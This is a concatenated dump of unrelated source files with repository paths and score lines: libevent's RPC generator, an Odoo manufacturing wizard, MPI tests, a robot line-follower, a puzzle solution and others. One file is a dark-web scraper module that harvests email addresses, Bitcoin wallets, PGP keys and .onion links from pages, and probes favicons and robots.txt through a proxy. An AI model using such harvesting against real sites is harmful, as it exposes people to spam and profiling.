 */

#include <stdlib.h>
#include <string.h>
#include <assert.h>
#include <event2/event-config.h>
#include <event2/event.h>
#include <event2/buffer.h>
#include <event2/tag.h>

#if defined(EVENT__HAVE___func__)
# ifndef __func__
#  define __func__ __func__
# endif
#elif defined(EVENT__HAVE___FUNCTION__)
# define __func__ __FUNCTION__
#else
# define __func__ __FILE__
#endif

""" % {
            "name": name,
            "script_name": _NAME,
            "script_version": _VERSION,
        }

        for statement in CPP_DIRECT:
            pre += "%s\n" % statement

        pre += '\n#include "%s"\n\n' % header_file

        pre += "void event_warn(const char *fmt, ...);\n"
        pre += "void event_warnx(const char *fmt, ...);\n\n"

        return pre

    @staticmethod
    def HeaderFilename(filename):
        """foo.rpc -> foo.h"""
        return ".".join(filename.split(".")[:-1]) + ".h"

    @staticmethod
    def CodeFilename(filename):
        """foo.rpc -> foo.gen.c"""
        return ".".join(filename.split(".")[:-1]) + ".gen.c"

    # Factory methods used by the parser to build the object model.
    @staticmethod
    def Struct(name):
        return StructCCode(name)

    @staticmethod
    def EntryBytes(entry_type, name, tag, fixed_length):
        return EntryBytes(entry_type, name, tag, fixed_length)

    @staticmethod
    def EntryVarBytes(entry_type, name, tag):
        return EntryVarBytes(entry_type, name, tag)

    @staticmethod
    def EntryInt(entry_type, name, tag, bits=32):
        return EntryInt(entry_type, name, tag, bits)

    @staticmethod
    def EntryString(entry_type, name, tag):
        return EntryString(entry_type, name, tag)

    @staticmethod
    def EntryStruct(entry_type, name, tag, struct_name):
        return EntryStruct(entry_type, name, tag, struct_name)

    @staticmethod
    def EntryArray(entry):
        return EntryArray(entry)
class CommandLine(object):
    """Argument parsing plus the top-level generate-both-files workflow."""

    def __init__(self, argv=None):
        """Initialize a command-line to launch event_rpcgen, as if
        from a command-line with CommandLine(sys.argv).  If you're
        calling this directly, remember to provide a dummy value
        for sys.argv[0]
        """
        global QUIETLY

        self.filename = None
        self.header_file = None
        self.impl_file = None
        self.factory = CCodeGenerator()

        parser = argparse.ArgumentParser(
            usage="%(prog)s [options] rpc-file [[h-file] c-file]"
        )
        parser.add_argument("--quiet", action="store_true", default=False)
        parser.add_argument("rpc_file", type=argparse.FileType("r"))

        # Optional positional h-file / c-file are picked up as extras.
        args, extra_args = parser.parse_known_args(args=argv)

        QUIETLY = args.quiet

        if extra_args:
            if len(extra_args) == 1:
                self.impl_file = extra_args[0].replace("\\", "/")
            elif len(extra_args) == 2:
                self.header_file = extra_args[0].replace("\\", "/")
                self.impl_file = extra_args[1].replace("\\", "/")
            else:
                parser.error("Spurious arguments provided")

        self.rpc_file = args.rpc_file

        # Derive any output names that were not given explicitly.
        if not self.impl_file:
            self.impl_file = self.factory.CodeFilename(self.rpc_file.name)

        if not self.header_file:
            self.header_file = self.factory.HeaderFilename(self.impl_file)

        if not self.impl_file.endswith(".c"):
            parser.error("can only generate C implementation files")
        if not self.header_file.endswith(".h"):
            parser.error("can only generate C header files")

    def run(self):
        """Parse the .rpc input and write the header and implementation."""
        filename = self.rpc_file.name
        header_file = self.header_file
        impl_file = self.impl_file
        factory = self.factory

        declare('Reading "%s"' % filename)

        with self.rpc_file:
            entities = Parse(factory, self.rpc_file)

        declare('... creating "%s"' % header_file)
        with open(header_file, "w") as header_fp:
            header_fp.write(factory.HeaderPreamble(filename))

            # Create forward declarations: allows other structs to reference
            # each other
            for entry in entities:
                entry.PrintForwardDeclaration(header_fp)
            header_fp.write("\n")

            for entry in entities:
                entry.PrintTags(header_fp)
                entry.PrintDeclaration(header_fp)
            header_fp.write(factory.HeaderPostamble(filename))

        declare('... creating "%s"' % impl_file)
        with open(impl_file, "w") as impl_fp:
            impl_fp.write(factory.BodyPreamble(filename, header_file))
            for entry in entities:
                entry.PrintCode(impl_fp)
def main(argv=None):
    """Run the generator; return 0 on success, 1 on a reported error.

    RpcGenError and environment (I/O) failures are reported on stderr
    rather than propagated, so the script exits with a clean status code.
    """
    try:
        CommandLine(argv=argv).run()
        return 0
    except RpcGenError as e:
        # BUG FIX: file.write() requires a string; passing the exception
        # object raised TypeError and masked the real error message.
        sys.stderr.write("%s\n" % e)
    except EnvironmentError as e:
        if e.filename and e.strerror:
            sys.stderr.write("%s: %s\n" % (e.filename, e.strerror))
        elif e.strerror:
            sys.stderr.write("%s\n" % e.strerror)
        else:
            raise
    return 1


if __name__ == "__main__":
    sys.exit(main(argv=sys.argv[1:]))
| 2.125 | 2 |
ticketing_system/domain/user.py | Uncensored-Developer/ticketing_system | 1 | 12761542 | from .base import Base
class User(Base):
    """Domain entity representing an authenticated user."""

    def __init__(self, token, email, user_type, name):
        self.token = token
        self.email = email
        self.user_type = user_type
        self.name = name

    @classmethod
    def from_dict(cls, adict):
        """Build a User from a plain dict (inverse of to_dict)."""
        return cls(
            token=adict['token'],
            email=adict['email'],
            user_type=adict['user_type'],
            name=adict['name']
        )

    def to_dict(self):
        """Serialize the user to a plain dict of its four attributes."""
        return {
            'token': self.token,
            'email': self.email,
            'user_type': self.user_type,
            'name': self.name
        }

    def __eq__(self, other):
        # BUG FIX: comparing against a non-User used to raise
        # AttributeError (no to_dict on the other operand); follow the
        # data-model convention and let Python fall back instead.
        if not isinstance(other, User):
            return NotImplemented
        return self.to_dict() == other.to_dict()
| 3.25 | 3 |
Darkweb/ScanningTheDarkWeb/WebScraper/torexplorer/extractors.py | catalyst256/CyberNomadResources | 20 | 12761543 | <filename>Darkweb/ScanningTheDarkWeb/WebScraper/torexplorer/extractors.py
import re
import validators
from torexplorer.helpers import validate_bitcoin_wallet
import hashlib
import requests
from torexplorer import settings as settings
def extract_crypto_wallets(html):
    """Return the valid Bitcoin wallet addresses found in *html*."""
    btc_pattern = re.compile(
        r'([1,3][123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz]{26,35})',
        re.MULTILINE | re.DOTALL)
    candidates = set(btc_pattern.findall(html))
    # Keep only candidates whose checksum actually validates.
    return [coin for coin in candidates if validate_bitcoin_wallet(coin)]
def extract_onion_links(html):
    """Return the set of v2 (16-char) and v3 (56-char) .onion addresses in *html*.

    Returns None if extraction fails (e.g. *html* is not a string).
    """
    try:
        short = re.compile(r'[a-z2-7]{16}\.onion', re.DOTALL | re.MULTILINE)
        longer = re.compile(r'[a-z2-7]{56}\.onion', re.DOTALL | re.MULTILINE)
        links = re.findall(short, html)
        links.extend(re.findall(longer, html))
        return set(links)
    except Exception:
        # BUG FIX: was a bare "except:", which also swallowed
        # SystemExit/KeyboardInterrupt.
        return None
def extract_email_addresses(html):
    """Return the syntactically valid e-mail addresses found in *html*."""
    email_pattern = re.compile(r'([\w.-]+@[\w.-]+\.\w+)', re.MULTILINE)
    candidates = set(email_pattern.findall(html))
    valid = []
    for candidate in candidates:
        # Skip image filenames that the loose regex mistakes for addresses,
        # then double-check the rest with the validators library.
        if '.png' not in candidate and validators.email(candidate):
            valid.append(candidate)
    return valid
def extract_pgp_blocks(html):
    """Return every ASCII-armored PGP block (BEGIN ... END) found in *html*."""
    pgp_pattern = re.compile(
        r"(-----BEGIN [^-]+-----[A-Za-z0-9+\/=\s]+-----END [^-]+-----)",
        re.MULTILINE)
    return pgp_pattern.findall(html)
# Thanks to @jms_dot_py for this code
def extract_google_codes(html):
    """Return de-duplicated Google AdSense/Analytics IDs found in *html*."""
    adsense = re.compile(r"pub-[0-9]{1,}", re.IGNORECASE)
    analytics = re.compile(r"ua-\d+-\d+", re.IGNORECASE)
    found = adsense.findall(html) + analytics.findall(html)
    # dict.fromkeys de-duplicates while preserving first-seen order.
    return list(dict.fromkeys(found))
# Variables for requests made outside of scraper
# Ad-hoc HTTP requests use the scraper's configured User-Agent and are
# routed through the configured HTTP proxy (settings come from the
# torexplorer settings module).
headers = {'User-Agent': settings.USER_AGENT}
proxies = {'http': settings.HTTP_PROXY, 'https': settings.HTTP_PROXY}
def find_favicon_hash(website):
    """Fetch /favicon.ico from *website* and return its MD5 hex digest.

    Returns None when the favicon cannot be retrieved (non-200 response).
    """
    url = '{0}/favicon.ico'.format(website)
    resp = requests.get(url, headers=headers, proxies=proxies)
    if not (resp and resp.status_code == 200):
        return None
    return hashlib.md5(resp.content).hexdigest()
def find_robots_information(website):
    """Fetch /robots.txt from *website* and return its Disallow paths.

    Each entry is the text after "Disallow: " with trailing carriage
    returns and "/" stripped; empty entries are dropped.  Returns None
    when robots.txt cannot be retrieved.
    """
    url = '{0}/robots.txt'.format(website)
    resp = requests.get(url, headers=headers, proxies=proxies)
    if not (resp and resp.status_code == 200):
        return None
    disallow = [line for line in resp.text.split('\n') if 'Disallow' in line]
    # NOTE(review): a Disallow line without ": " would raise IndexError
    # here; assumed well-formed robots.txt -- TODO confirm.
    robots = list(filter(None, [str(i.split(': ')[1]).strip('\r').rstrip('/') for i in disallow]))
    return robots
opsplugins/system.py | OpenSwitchNOS/openswitch-ops-sysd | 0 | 12761544 | #!/usr/bin/env python
# Copyright (C) 2016 Hewlett Packard Enterprise Development LP
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from opsvalidator.base import BaseValidator
from opsvalidator import error
from opsvalidator.error import ValidationError
from opsrest.utils.utils import get_column_data_from_row
import os
from copy import copy
# Cache mapping timezone name -> zoneinfo file path; built lazily on
# first lookup.  (The previous module-level "global" statement was a
# no-op and has been removed.)
list_of_timezones = None


def build_timezone_db():
    """Populate the module-level cache from the POSIX zoneinfo tree."""
    global list_of_timezones
    path = "/usr/share/zoneinfo/posix/"
    for root, _directories, filenames in os.walk(path):
        for filename in filenames:
            full_path = os.path.join(root, filename)
            # The timezone name is the file path relative to the zoneinfo
            # root (e.g. "America/New_York").  The redundant copy() of the
            # path string was removed; str.replace already returns a new
            # string.
            timezone = full_path.replace(path, "")
            list_of_timezones[timezone] = full_path


def check_valid_timezone(timezone_user_input):
    """Return True if *timezone_user_input* names an installed timezone."""
    global list_of_timezones
    if list_of_timezones is None:
        # First call: build the cache once, then answer from it.
        list_of_timezones = {}
        build_timezone_db()
    # Idiom fix: membership test on the dict itself instead of .keys(),
    # and return the boolean directly.
    return timezone_user_input in list_of_timezones
class SystemValidator(BaseValidator):
    """Validates modifications to rows of the System table."""

    resource = "system"

    def validate_modification(self, validation_args):
        """Reject the change when the requested timezone is unknown."""
        system_row = validation_args.resource_row
        if not hasattr(system_row, "timezone"):
            return
        tz = get_column_data_from_row(system_row, "timezone")[0]
        if not check_valid_timezone(tz):
            raise ValidationError(error.VERIFICATION_FAILED,
                                  "Invalid timezone %s." % (tz))
week2/testing_session2_draft/QRLineDetectorAngle.py | SR42-dev/path-following-robot-color-detection-plus-gsheets-api-comms | 0 | 12761545 | <gh_stars>0
from pyzbar.pyzbar import decode
import cv2
import numpy as np
import math
import serial
import time
ser = serial.Serial('COM3', baudrate = 9600, timeout = 1)
def write_read(x):
    # x arrives as the bytes payload decoded from a QR code (e.g. b'f');
    # str(b'f') == "b'f'", so index 2 extracts the first decoded character.
    # NOTE(review): fragile for multi-character or escaped payloads --
    # presumably every command is a single ASCII character; confirm with
    # the Arduino firmware.
    x = str(x)[2]
    ser.write(bytes(x, 'utf-8'))
    # Give the microcontroller time to act before reading its reply.
    time.sleep(0.05)
    data = ser.readline()
    return data
def barcodeReader(image):
    """Detect barcodes/QR codes in *image*, forward the decoded command
    over the serial link, and return the device's reply.

    Returns None when nothing usable was decoded.  Also draws detection
    rectangles on the image and refreshes the "Image" window.
    """
    img = image
    value = None  # BUG FIX: was unbound (NameError) when nothing decoded
    cv2.imshow("Image", img)
    detectedBarcodes = decode(img)
    if not detectedBarcodes:
        print("Barcode Not Detected or your barcode is blank/corrupted!")
        cv2.imshow("Image", img)
    else:
        for barcode in detectedBarcodes:
            # Highlight the detected symbol with a padded red rectangle.
            (x, y, w, h) = barcode.rect
            cv2.rectangle(img, (x - 10, y - 10),
                          (x + w + 10, y + h + 10),
                          (0, 0, 255), 5)
            if barcode.data != " ":
                dir1 = barcode.data
                print(str(dir1)[2])
                # BUG FIX: the old "while True: ...; break" wrapper was a
                # plain call, and dir1/value could be unbound when
                # barcode.data == " " -- keep the exchange inside this
                # branch instead.
                value = write_read(dir1)
        cv2.imshow("Image", img)
        print(value)
    return value
# Open the default camera and request a 1280x720 capture (property ids
# 3/4 are CAP_PROP_FRAME_WIDTH / CAP_PROP_FRAME_HEIGHT).
cap = cv2.VideoCapture(0)
cap.set(3,1280)
cap.set(4,720)
#hsv lower and upper values for a yellow ball used for testing. Values found using trackbars.
path_lower = np.array([115,35,60])
path_upper = np.array([133,255,255])
font = cv2.FONT_HERSHEY_COMPLEX
# 5x5 structuring element for the morphological open/erode/dilate passes.
kernel = np.ones((5,5),np.uint8)
# Steering scale: delay in ms per degree of error is 100/skew_value.
skew_value = 15
# Distance constant for the angular-error estimate -- presumably a
# focal-length figure in pixels; TODO confirm calibration.
f_dist = 200*3
# Main control loop: track the colored path, compute a steering delay,
# and react to QR-code commands.  Exit with Esc.
while True:
    ret, frame = cap.read()
    if not ret:
        # Camera read failed -- try to reopen it and retry.
        cap = cv2.VideoCapture(0)
        continue
    (h, w) = frame.shape[:2]
    # Isolate the path color: blur -> HSV -> threshold -> clean up mask.
    blur = cv2.GaussianBlur(frame,(5,5),cv2.BORDER_DEFAULT)
    hsvvid = cv2.cvtColor(blur, cv2.COLOR_BGR2HSV)
    path_mask = cv2.inRange(hsvvid, path_lower, path_upper)
    opening = cv2.morphologyEx(path_mask, cv2.MORPH_OPEN, kernel)
    erosion = cv2.erode(opening,kernel,iterations = 1)
    dilation = cv2.dilate(erosion,kernel,iterations = 5)
    path_contours, hierarchy = cv2.findContours(dilation, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
    cv2.drawContours(frame, path_contours, -1, (0,255,0), 3)
    if len(path_contours) > 0:
        # Track the largest contour as the path.
        largest = max(path_contours, key = cv2.contourArea)
        x_2, y_2, w_2, h_2 = cv2.boundingRect(largest)
        cv2.rectangle(frame, (x_2, y_2), (x_2 + w_2, y_2 + h_2), (0, 0, 255), 3)
        # Horizontal pixel offset of the path center from the frame center.
        error = x_2 + (w_2/2) - w/2
        #cv2.putText(frame, str(error), (5, 50), font, 2, (0, 0, 255), 2, cv2.LINE_AA)
        # Orientation of the path from the minimum-area rectangle,
        # normalized into a signed steering angle.
        blackbox = cv2.minAreaRect(largest)
        (x_min, y_min), (w_min, h_min), ang = blackbox
        if ang > 45:
            ang = ang - 90
        if w_min < h_min and ang < 0:
            ang = 90 + ang
        if w_min > h_min and ang > 0:
            ang = ang - 90
        ang = int(ang)
        box = cv2.boxPoints(blackbox)
        box = np.int0(box)
        cv2.drawContours(frame, [box], 0, (0,0,255), 3)
        #cv2.putText(frame, str(ang), (5, 50), font, 2, (0, 0, 255), 2, cv2.LINE_AA)
        # Convert the pixel offset into an angle (sign-preserving).
        if error != 0:
            error_angle = abs((180/math.pi)*math.asin(abs(error)/f_dist)/error)*error
        else:
            error_angle = 0
        # Steering delay (ms) proportional to total angular error.
        a_delay = (100/skew_value)*(ang + error_angle)
        a_delay = int(a_delay)
        #cv2.putText(frame, str(a_delay), (5, 50), font, 2, (0, 0, 255), 2, cv2.LINE_AA)
        ser.write(str(a_delay).encode())
        # NOTE(review): the four QR branches below compare against empty
        # strings -- placeholders that must be filled in with the actual
        # QR payloads, otherwise any None/'' result matches the first one.
        if barcodeReader(frame) == '' : # edit string to contain qrcode data, case - switch to left track
            i = 'l' # edit to go to track on left
            ser.write(i.encode())
            print('go left')
            left_text = 'Go left'
            cv2.putText(frame, left_text, (5, 50), font, 2, (0, 0, 255), 2, cv2.LINE_AA)
            time.sleep(abs(a_delay) / 1000)
        elif barcodeReader(frame) == '' : # edit string to contain qrcode data, case - switch to right track
            i = 'r' # edit to go to track on right
            ser.write(i.encode())
            print('go right')
            left_text = 'Go right'
            cv2.putText(frame, left_text, (5, 50), font, 2, (0, 0, 255), 2, cv2.LINE_AA)
            time.sleep(abs(a_delay) / 1000)
        elif barcodeReader(frame) == '' : # edit string to contain qrcode data, case - go to center
            i = 'r' # edit to go to center
            ser.write(i.encode())
            print('go right')
            left_text = 'Go right'
            cv2.putText(frame, left_text, (5, 50), font, 2, (0, 0, 255), 2, cv2.LINE_AA)
            time.sleep(abs(a_delay) / 1000)
        elif barcodeReader(frame) == '' : # edit string to contain qrcode data, case - stop
            i = '' # edit to stop
            ser.write(i.encode())
            print('stop')
            left_text = 'stop'
            cv2.putText(frame, left_text, (5, 50), font, 2, (0, 0, 255), 2, cv2.LINE_AA)
            time.sleep(abs(a_delay) / 1000)
        # No QR command: steer from the computed delay.
        elif a_delay < -20:
            i = 'l'
            ser.write(i.encode())
            print('go left')
            left_text = 'Go left'
            cv2.putText(frame, left_text, (5, 50), font, 2, (0, 0, 255), 2, cv2.LINE_AA)
            time.sleep(abs(a_delay)/1000)
        elif a_delay > 20:
            i = 'r'
            ser.write(i.encode())
            print('go right')
            right_text = 'Go right'
            cv2.putText(frame, right_text, (5, 50), font, 2, (0, 0, 255), 2, cv2.LINE_AA)
            time.sleep(abs(a_delay)/1000)
        else:
            i = 'f'
            ser.write(i.encode())
            print('go straight')
            straight_text = 'Go straight'
            cv2.putText(frame, straight_text, (5, 50), font, 2, (0, 0, 255), 2, cv2.LINE_AA)
            time.sleep(0.1)
    else:
        # Path lost: turn right until the path is reacquired.
        i = 'r'
        ser.write(i.encode())
        print('go right')
        straight_text = 'Go right'
        cv2.putText(frame, straight_text, (5, 50), font, 2, (0, 0, 255), 2, cv2.LINE_AA)
        time.sleep(0.1)
    cv2.imshow('path video', frame)
    key = cv2.waitKey(1)
    if key == 27: #press esc to exit
        break
cap.release()
cv2.destroyAllWindows()
| 2.75 | 3 |
apps/odoo/lib/odoo-10.0.post20170615-py2.7.egg/odoo/addons/mrp/wizard/mrp_product_produce.py | gtfarng/Odoo_migrade | 1 | 12761546 | <gh_stars>1-10
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from datetime import datetime
from odoo import api, fields, models, _
from odoo.addons import decimal_precision as dp
from odoo.exceptions import UserError
from odoo.tools import float_compare, float_round
class MrpProductProduce(models.TransientModel):
    """Wizard used to record production output (quantity + lot tracking)."""

    _name = "mrp.product.produce"
    _description = "Record Production"

    @api.model
    def default_get(self, fields):
        # NOTE: ``fields`` here is the standard default_get argument (list
        # of field names) and shadows the odoo ``fields`` module inside
        # this method.
        res = super(MrpProductProduce, self).default_get(fields)
        if self._context and self._context.get('active_id'):
            production = self.env['mrp.production'].browse(self._context['active_id'])
            #serial_raw = production.move_raw_ids.filtered(lambda x: x.product_id.tracking == 'serial')
            main_product_moves = production.move_finished_ids.filtered(lambda x: x.product_id.id == production.product_id.id)
            serial_finished = (production.product_id.tracking == 'serial')
            serial = bool(serial_finished)
            # Serial-tracked products are produced one unit at a time;
            # otherwise propose the remaining quantity (never negative).
            if serial_finished:
                quantity = 1.0
            else:
                quantity = production.product_qty - sum(main_product_moves.mapped('quantity_done'))
                quantity = quantity if (quantity > 0) else 0
            lines = []
            existing_lines = []
            # Pre-create one tracking line per tracked raw-material move.
            for move in production.move_raw_ids.filtered(lambda x: (x.product_id.tracking != 'none') and x.state not in ('done', 'cancel')):
                if not move.move_lot_ids.filtered(lambda x: not x.lot_produced_id):
                    # Scale the BoM line quantity to the produced quantity.
                    qty = quantity / move.bom_line_id.bom_id.product_qty * move.bom_line_id.product_qty
                    if move.product_id.tracking == 'serial':
                        # Serial components: one line per unit.
                        while float_compare(qty, 0.0, precision_rounding=move.product_uom.rounding) > 0:
                            lines.append({
                                'move_id': move.id,
                                'quantity': min(1,qty),
                                'quantity_done': 0.0,
                                'plus_visible': True,
                                'product_id': move.product_id.id,
                                'production_id': production.id,
                            })
                            qty -= 1
                    else:
                        lines.append({
                            'move_id': move.id,
                            'quantity': qty,
                            'quantity_done': 0.0,
                            'plus_visible': True,
                            'product_id': move.product_id.id,
                            'production_id': production.id,
                        })
                else:
                    existing_lines += move.move_lot_ids.filtered(lambda x: not x.lot_produced_id).ids
            res['serial'] = serial
            res['production_id'] = production.id
            res['product_qty'] = quantity
            res['product_id'] = production.product_id.id
            res['product_uom_id'] = production.product_uom_id.id
            # Python 2 only: map() returns a list here, so "+" concatenates.
            # (0, 0, vals) creates new lines, (4, id) links existing ones
            # -- presumably the standard Odoo relational commands; confirm
            # against the ORM docs before porting to Python 3.
            res['consume_line_ids'] = map(lambda x: (0,0,x), lines) + map(lambda x:(4, x), existing_lines)
        return res
serial = fields.Boolean('Requires Serial')
production_id = fields.Many2one('mrp.production', 'Production')
product_id = fields.Many2one('product.product', 'Product')
product_qty = fields.Float(string='Quantity', digits=dp.get_precision('Product Unit of Measure'), required=True)
product_uom_id = fields.Many2one('product.uom', 'Unit of Measure')
lot_id = fields.Many2one('stock.production.lot', string='Lot')
consume_line_ids = fields.Many2many('stock.move.lots', 'mrp_produce_stock_move_lots', string='Product to Track')
product_tracking = fields.Selection(related="product_id.tracking")
@api.multi
def do_produce(self):
    """Record the produced quantity on the linked production order.

    Increments ``quantity_done_store`` on every *untracked* raw-material
    and finished move (tracked moves get their lots via the wizard's
    default data), registers the finished lot through
    :meth:`check_finished_move_lots`, and moves the order from
    'confirmed' to 'progress' on the first produce.

    :raises UserError: if the quantity to produce is not strictly positive.
    :return: client action closing the wizard window.
    """
    # Nothing to do for lots since values are created using default data (stock.move.lots)
    moves = self.production_id.move_raw_ids
    quantity = self.product_qty
    if float_compare(quantity, 0, precision_rounding=self.product_uom_id.rounding) <= 0:
        raise UserError(_('You should at least produce some quantity'))
    # Consume untracked raw materials in proportion to the produced quantity.
    for move in moves.filtered(lambda x: x.product_id.tracking == 'none' and x.state not in ('done', 'cancel')):
        if move.unit_factor:
            rounding = move.product_uom.rounding
            move.quantity_done_store += float_round(quantity * move.unit_factor, precision_rounding=rounding)
    # Register produced quantities on untracked finished moves.
    moves = self.production_id.move_finished_ids.filtered(lambda x: x.product_id.tracking == 'none' and x.state not in ('done', 'cancel'))
    for move in moves:
        rounding = move.product_uom.rounding
        if move.product_id.id == self.production_id.product_id.id:
            # Main finished product: add the produced quantity directly.
            move.quantity_done_store += float_round(quantity, precision_rounding=rounding)
        elif move.unit_factor:
            # byproducts handling: scale by the move's unit factor
            move.quantity_done_store += float_round(quantity * move.unit_factor, precision_rounding=rounding)
    self.check_finished_move_lots()
    # First produce on a confirmed order starts it.
    if self.production_id.state == 'confirmed':
        self.production_id.write({
            'state': 'progress',
            'date_start': datetime.now(),
        })
    return {'type': 'ir.actions.act_window_close'}
@api.multi
def check_finished_move_lots(self):
    """Register the produced lot and stamp it on consumed raw-material lots.

    Creates (or tops up) the ``stock.move.lots`` line of the finished move
    with ``self.lot_id``, then tags every consumed raw-material move lot
    with that produced lot, splitting lines that are only partially
    consumed so the remainder stays open.

    :raises UserError: if the finished product is tracked and no lot is set.
    :return: True
    """
    lots = self.env['stock.move.lots']
    produce_move = self.production_id.move_finished_ids.filtered(lambda x: x.product_id == self.product_id and x.state not in ('done', 'cancel'))
    if produce_move and produce_move.product_id.tracking != 'none':
        if not self.lot_id:
            raise UserError(_('You need to provide a lot for the finished product'))
        # Reuse an existing line for the same lot if one exists.
        existing_move_lot = produce_move.move_lot_ids.filtered(lambda x: x.lot_id == self.lot_id)
        if existing_move_lot:
            existing_move_lot.quantity += self.product_qty
            existing_move_lot.quantity_done += self.product_qty
        else:
            vals = {
                'move_id': produce_move.id,
                'product_id': produce_move.product_id.id,
                'production_id': self.production_id.id,
                'quantity': self.product_qty,
                'quantity_done': self.product_qty,
                'lot_id': self.lot_id.id,
            }
            lots.create(vals)
    # Link consumed raw-material lots to the lot that was just produced.
    for move in self.production_id.move_raw_ids:
        for movelots in move.move_lot_ids.filtered(lambda x: not x.lot_produced_id):
            if movelots.quantity_done and self.lot_id:
                # Possibly the entire move is selected
                remaining_qty = movelots.quantity - movelots.quantity_done
                if remaining_qty > 0:
                    # Split: the done part is stamped with the produced lot,
                    # the remaining quantity stays on the original line.
                    default = {'quantity': movelots.quantity_done, 'lot_produced_id': self.lot_id.id}
                    new_move_lot = movelots.copy(default=default)
                    movelots.write({'quantity': remaining_qty, 'quantity_done': 0})
                else:
                    # Fully consumed: stamp the line in place.
                    movelots.write({'lot_produced_id': self.lot_id.id})
    return True
| 2.03125 | 2 |
vmad/lib/tests/test_mpi.py | Maxelee/vmad | 2 | 12761547 | from vmad.lib import linalg, mpi
from vmad.testing import BaseScalarTest
from mpi4py import MPI
import numpy
from pprint import pprint
class Test_allreduce(BaseScalarTest):
    """Gradient test for ``mpi.allreduce``: y = (sum over ranks of x) ** 2."""

    to_scalar = staticmethod(linalg.to_scalar)

    comm = MPI.COMM_WORLD
    # x differs per rank, so the reference value y is reduced over ranks.
    x = comm.rank + 1.0
    y = comm.allreduce(x) ** 2
    x_ = numpy.eye(1)

    # self.x is distributed, thus allreduce along the rank axis.
    def inner(self, a, b):
        return self.comm.allreduce(numpy.sum(a * b))

    def model(self, x):
        return mpi.allreduce(x, self.comm)
class Test_allbcast(BaseScalarTest):
    """Gradient test for ``mpi.allbcast``: broadcast x, scale per rank, reduce."""

    to_scalar = staticmethod(lambda x: x)

    comm = MPI.COMM_WORLD
    # x is the same on every rank; y reduces the per-rank scaled values.
    x = 2.0
    y = comm.allreduce(x * (comm.rank + 1))
    x_ = numpy.eye(1)

    # self.x is universal, thus no special allreduce here.
    def inner(self, a, b):
        return numpy.sum(a*b)

    def model(self, x):
        x = mpi.allbcast(x, self.comm)
        x = x * (self.comm.rank + 1)
        return mpi.allreduce(x, comm=self.comm)
| 2.171875 | 2 |
2020/day7.py | VessToska/Advent-of-Code | 3 | 12761548 | <gh_stars>1-10
from collections import OrderedDict
day_num = 7

# Read the puzzle input. A context manager guarantees the handle is closed
# even if the read raises (the original open/read/close pair leaked on error).
with open("input/day7.txt", "r") as file_load:
    file_in = file_load.read()

# Strip punctuation and the "bag(s)"/"contain" filler words. Order matters:
# longer tokens ("bags ") must be removed before their prefixes ("bag").
for _token in (",", ".", "bags ", "contain ", "bags", "bag ", "bag"):
    file_in = file_in.replace(_token, "")

file_in = file_in.split("\n")
# Each line ends with a stray trailing space after the replacements; drop it.
file_in = [temp_bag[:-1] for temp_bag in file_in]

# Expand every rule line into a flat list:
# [container colour, contained colour repeated <count> times, ...]
file_new = []
for temp_bags in file_in:
    temp_hold = []
    iter_bag = iter(temp_bags.split(" "))
    # The first two words form the container's colour ("shiny gold", ...).
    temp_hold.append(next(iter_bag) + " " + next(iter_bag))
    while True:
        try:
            bag_num = int(next(iter_bag))
            bag_glint = next(iter_bag)
            bag_color = next(iter_bag)
            # Repeat each contained colour once per bag so part 2 can count.
            for temp_count in range(bag_num):
                temp_hold.append(bag_glint + " " + bag_color)
        except (StopIteration, ValueError):
            # Rule exhausted, or it contains "no other" bags (int() fails).
            break
    file_new.append(temp_hold)

# file_in: deduplicated per rule (order preserved) — part 1 only needs
# reachability, not multiplicities.
file_in = []
for temp_bags in file_new:
    file_in.append(list(OrderedDict.fromkeys(temp_bags)))

# Drop the shiny-gold rule itself and contentless rules: neither can be an
# *outer* container of a shiny gold bag.
input_search = [temp_bags[0] for temp_bags in file_in]
file_in.pop(input_search.index("shiny gold"))
file_in = [temp_bags for temp_bags in file_in if len(temp_bags) != 1]
def run():
    """Solve AoC 2020 day 7.

    Returns a tuple: (number of colours that can eventually hold a shiny
    gold bag, total number of bags packed inside one shiny gold bag).
    Relies on the module-level ``file_in`` (deduplicated rules) and
    ``file_new`` (rules with multiplicities).
    """

    def count_bags(rules, colour):
        # A bag counts as itself plus everything packed inside it, recursively.
        names = [rule[0] for rule in rules]
        contents = rules[names.index(colour)][1:]
        return 1 + sum(count_bags(rules, inner) for inner in contents)

    def outer_holders(rules):
        # Part 1: fixed-point closure of colours that eventually hold shiny gold.
        reachable = [rule[0] for rule in rules if "shiny gold" in rule]
        while True:
            grew = False
            for rule in list(rules):
                if rule[0] in reachable:
                    continue
                if any(colour in rule for colour in reachable):
                    reachable.insert(0, rule[0])
                    rules.remove(rule)
                    grew = True
            if not grew:
                return len(reachable)

    def bags_inside(rules):
        # Part 2: total bags required inside a single shiny gold bag.
        names = [rule[0] for rule in rules]
        contents = rules[names.index("shiny gold")][1:]
        return sum(count_bags(rules, inner) for inner in contents)

    return outer_holders(file_in.copy()), bags_inside(file_new)


if __name__ == "__main__":
    print(run())
botbot/schecks.py | jackstanek/BotBot | 2 | 12761549 | """Strict shared-folder permission checks"""
import stat
def file_groupreadable(path):
    """Flag files that members of the owning group cannot read.

    Returns the problem code 'PROB_FILE_NOT_GRPRD' when the group read
    bit is missing, otherwise None.
    """
    mode = path.stat().mode
    if not (mode & stat.S_IRGRP):
        return 'PROB_FILE_NOT_GRPRD'
def file_group_executable(path):
    """Flag user-executable regular files that lack the group execute bit.

    Directories are ignored. Returns 'PROB_FILE_NOT_GRPEXEC' when the
    owner can execute the file but the group cannot, otherwise None.
    """
    mode = path.stat().mode
    if stat.S_ISDIR(mode):
        return
    owner_can_exec = bool(mode & stat.S_IXUSR)
    group_can_exec = bool(mode & stat.S_IXGRP)
    if owner_can_exec and not group_can_exec:
        return 'PROB_FILE_NOT_GRPEXEC'
def dir_group_readable(path):
    """Flag directories the owning group cannot traverse or write.

    Non-directories are ignored. Returns 'PROB_DIR_NOT_ACCESSIBLE' when
    the group execute (traverse) bit is missing, 'PROB_DIR_NOT_WRITABLE'
